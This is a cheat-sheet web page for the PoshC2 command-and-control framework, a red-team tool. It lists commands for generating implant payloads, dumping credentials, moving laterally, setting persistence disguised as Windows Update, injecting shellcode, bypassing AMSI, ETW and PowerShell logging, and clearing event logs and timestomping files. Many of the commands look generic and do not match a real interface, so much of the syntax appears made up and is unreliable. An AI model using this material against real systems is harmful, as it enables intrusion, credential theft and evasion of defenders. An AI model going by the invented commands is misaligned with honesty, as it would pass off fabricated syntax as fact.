1337skills.com

Appearance

PoshC2 Framework Cheat Sheet

Overview

PoshC2 is a proxy-aware C2 framework developed by Nettitude for red teaming and post-exploitation activities. It features PowerShell exploitation capabilities, lateral movement tools, and comprehensive proxy support for operating in restricted network environments.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Ubuntu/Debian Installation

bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential

# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2

# Install PoshC2
sudo ./Install.sh

# Alternative pip installation
pip3 install poshc2

Docker Installation

bash
# Pull PoshC2 Docker image
docker pull nettitude/poshc2

# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2

# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2

Manual Installation

bash
# Install Python dependencies
pip3 install -r requirements.txt

# Install additional tools
sudo apt install mingw-w64 mono-mcs

# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"

Basic Usage

Starting PoshC2 Server

bash
# Start PoshC2 server
poshc2 --start

# Start with custom configuration
poshc2 --start --config /path/to/config.yml

# Start with specific project
poshc2 --start --project MyProject

Creating New Project

bash
# Create new project
poshc2 --new-project ProjectName

# List projects
poshc2 --list-projects

# Switch project
poshc2 --project ProjectName

Command Reference

Server Management

CommandDescription
helpDisplay help menu
show-urlsShow payload URLs
list-implantsList active implants
implant-handlerEnter implant handler
quitExit PoshC2

Implant Handler Commands

CommandDescription
helpShow implant commands
backReturn to main menu
list-implantsList all implants
use <implant-id>Select implant
kill <implant-id>Kill implant
remove-implant <implant-id>Remove implant from database

Implant Interaction

CommandDescription
helpShow available commands
shell <command>Execute shell command
upload-file <local> <remote>Upload file
download-file <remote>Download file
screenshotTake screenshot
get-systemAttempt privilege escalation

Payload Generation

PowerShell Payloads

bash
# Generate PowerShell payload
poshc2 --gen-payload powershell

# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded

# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080

Executable Payloads

bash
# Generate Windows executable
poshc2 --gen-payload exe

# Generate DLL payload
poshc2 --gen-payload dll

# Generate service executable
poshc2 --gen-payload service-exe

Web Payloads

bash
# Generate HTA payload
poshc2 --gen-payload hta

# Generate macro payload
poshc2 --gen-payload macro

# Generate JavaScript payload
poshc2 --gen-payload js

Linux Payloads

bash
# Generate Linux Python payload
poshc2 --gen-payload py

# Generate Linux shell payload
poshc2 --gen-payload sh

# Generate Linux ELF payload
poshc2 --gen-payload elf

Proxy Configuration

HTTP Proxy Support

bash
# Configure HTTP proxy
set-proxy http://proxy.company.com:8080

# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080

# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080

Proxy Chain Configuration

bash
# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128

Proxy Testing

bash
# Test proxy connectivity
test-proxy http://proxy.company.com:8080

# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080

Post-Exploitation Commands

System Information

bash
# Get system information
get-computerinfo

# Get current user
whoami

# Get domain information
get-domain

# Get local users
get-localuser

# Get local groups
get-localgroup

Credential Harvesting

bash
# Dump SAM database
hashdump

# Dump LSA secrets
lsa-secrets

# Dump cached credentials
cachedump

# Extract browser passwords
get-browserdata

# Dump WiFi passwords
get-wifipasswords

Active Directory Enumeration

bash
# Get domain controllers
get-domaincontroller

# Get domain users
get-domainuser

# Get domain groups
get-domaingroup

# Get domain computers
get-domaincomputer

# Get domain admins
get-domainadmin

Lateral Movement

bash
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"

# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"

# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"

# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"

Persistence

bash
# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"

# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"

# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"

Advanced Features

PowerShell Modules

bash
# Load PowerShell module
loadmodule /path/to/module.ps1

# Import PowerView
loadmodule PowerView

# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz

# Import PowerUp
loadmodule PowerUp

.NET Assembly Execution

bash
# Execute .NET assembly
run-exe /path/to/assembly.exe arguments

# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments

# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll

Process Injection

bash
# Inject into process
inject-shellcode -processid 1234 -shellcode <base64>

# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll

Network Operations

bash
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

# Network discovery
invoke-networkscan -subnet 192.168.1.0/24

# SMB enumeration
invoke-smbenum -target 192.168.1.10

# Share enumeration
invoke-shareenum -target 192.168.1.10

Evasion Techniques

AMSI Bypass

bash
# AMSI bypass
amsi-bypass

# Custom AMSI bypass
amsi-bypass -method custom

# Reflection-based bypass
amsi-bypass -method reflection

ETW Bypass

bash
# ETW bypass
etw-bypass

# Disable ETW logging
disable-etw

# Patch ETW functions
patch-etw

PowerShell Logging Bypass

bash
# Disable PowerShell logging
disable-pslogging

# Bypass script block logging
bypass-scriptblocklogging

# Disable module logging
disable-modulelogging

Obfuscation

bash
# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"

# String obfuscation
obfuscate-string "sensitive string"

# Variable obfuscation
obfuscate-variables

Pivoting and Tunneling

SOCKS Proxy

bash
# Start SOCKS proxy
start-socksproxy -port 1080

# Stop SOCKS proxy
stop-socksproxy

# List proxy connections
list-socksproxy

Port Forwarding

bash
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

# Stop port forward
stop-portforward -id 1

Beacon Chaining

bash
# Create beacon chain
new-beacon -parent <parent-id> -child <child-id>

# List beacon chains
list-beacons

# Remove beacon chain
remove-beacon -id <beacon-id>

Operational Security

Communication Security

bash
# Use HTTPS communications
set-comms https

# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"

# Domain fronting
set-domainfront cdn.example.com

Payload Security

bash
# Encrypt payloads
encrypt-payload -key "encryption-key"

# Sign payloads
sign-payload -cert /path/to/cert.pfx

# Obfuscate payloads
obfuscate-payload -method xor

Anti-Forensics

bash
# Clear event logs
clear-eventlogs

# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"

# Secure delete
sdelete -file /path/to/file

# Clear tracks
clear-tracks

Troubleshooting

Connection Issues

bash
# Check implant connectivity
test-connectivity

# Verify proxy settings
show-proxy

# Test DNS resolution
test-dns google.com

# Check firewall rules
get-firewallrules

Payload Issues

bash
# Regenerate payloads
regenerate-payloads

# Test payload execution
test-payload /path/to/payload.exe

# Check AV detection
test-av /path/to/payload.exe

Performance Issues

bash
# Adjust beacon interval
set-beacon-time 30

# Optimize jitter
set-jitter 0.2

# Reduce payload size
compress-payload

Database Issues

bash
# Repair database
repair-database

# Backup database
backup-database /path/to/backup

# Restore database
restore-database /path/to/backup

Configuration

Server Configuration

yaml
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"

Proxy Configuration

yaml
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http"  # http, socks4, socks5

Resources

This cheat sheet provides a comprehensive reference for using PoshC2 Framework. Always ensure you have proper authorization before using this tool in any environment.